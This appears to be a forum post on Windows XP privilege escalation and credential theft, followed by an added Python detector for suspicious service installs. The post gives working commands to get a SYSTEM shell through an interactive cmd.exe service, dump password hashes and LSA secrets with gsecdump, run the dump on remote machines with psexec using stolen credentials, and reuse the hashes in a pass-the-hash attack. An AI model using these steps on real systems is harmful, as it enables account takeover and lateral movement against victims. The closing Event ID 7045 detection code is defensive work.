To get a DOS Prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel ([email protected])
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the HASH information just grabbed with gsecdump into the local lsass process, to carry out a hash injection attack. The foreigners really are good at this; admins are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need to be cracked at all; it is just a matter of using the tool. As the original article puts it well: whether the password is set to 4 characters or 127, once you have the hash, it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx
I had a look at the original source; it seems to be from /2007/03/16/. Frustrating, what a gap.
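Both service tricks in the post (an interactive service whose binary path is cmd.exe, and the service that PsExec installs for its -s switch) leave the same trace on the target: the Service Control Manager writes a "service was installed" record (Event ID 7045 in the System log) with the service name, image path and account. The following is an added Python example, not code from the original post or from any tool named in it, that runs that check over constructed records; the simplified record layout, the sample services and the "Backup Agent" entries are assumptions of the example, while PSEXESVC is PsExec's default service name.

```python
# Added example: spot service installs like the ones above in constructed records
# modelled on Service Control Manager Event ID 7045 (System log, "service installed").
SAMPLE_EVENTS = [
    # The sc create command from the post: cmd.exe registered as a LocalSystem service.
    {"event_id": 7045, "service_name": "shellcmdline",
     "image_path": r"C:\WINDOWS\system32\cmd.exe /K start", "account": "LocalSystem"},
    # The service PsExec installs when run with -s (its default name is PSEXESVC).
    {"event_id": 7045, "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    # A benign vendor service with a quoted path and arguments (constructed).
    {"event_id": 7045, "service_name": "Backup Agent",
     "image_path": r'"C:\Program Files\Vendor\agent.exe" --service', "account": "LocalSystem"},
    # A service state-change event (7036) that the check must ignore.
    {"event_id": 7036, "service_name": "Backup Agent", "image_path": "", "account": ""},
]

# Command interpreters and launchers that rarely belong in a service image path.
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
# Service names installed by known remote-execution tools.
KNOWN_TOOL_SERVICES = {"PSEXESVC"}


def first_executable(image_path):
    """Return the lower-cased basename of the executable at the start of a service image path."""
    path = image_path.strip()
    if path.startswith('"'):
        path = path[1:].split('"', 1)[0]  # quoted path: take what is inside the quotes
    else:
        path = path.split(" ", 1)[0]      # unquoted path: stop at the first argument
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons a service-install event looks like the technique above (empty if none)."""
    reasons = []
    if event.get("event_id") != 7045:
        return reasons
    exe = first_executable(event["image_path"])
    if exe in INTERPRETERS:
        reasons.append(f"service binary is an interpreter ({exe}) running as {event['account']}")
    if event["service_name"].upper() in KNOWN_TOOL_SERVICES:
        reasons.append("service name matches a remote-execution tool")
    return reasons


def suspicious_services(events):
    """Map service name -> reasons for every event that trips at least one check."""
    return {e["service_name"]: classify(e) for e in events if classify(e)}
```

On a real host the same fields come from the System log (for example via Get-WinEvent filtered on Id 7045), and the shellcmdline entry is flagged even though sc start failed with error 1053, because the install itself is what gets logged.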